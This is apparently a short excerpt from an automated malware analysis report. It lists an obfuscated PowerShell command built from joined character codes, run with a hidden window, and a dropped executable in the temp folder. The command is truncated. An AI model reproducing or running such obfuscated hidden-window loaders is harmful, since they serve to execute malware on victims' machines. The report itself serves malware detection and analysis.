Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -jOin('41L70h94R122S111M79M88S45@48Z45R99K104@122h32h98K111Z103Z104L110S121@45M127~108L99M105h98M96K54~41M78@93Z123M90S100h122M45M48>45>99K104M122K32h98K111S103R104>110Z121L45~94>116S126R121M10...
- %TEMP%\4472.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -jOin('41L70h94R122S111M79M88S45@48Z45R99K104@122h32h98K111Z103Z104L110S121@45M127~108L99M105h98M96K54~41M78@93Z123M90S100h122M45M48>45>99K104M122K32h98K111S103R104>110Z121L45~94>116S126R121M10...' (with hidden window)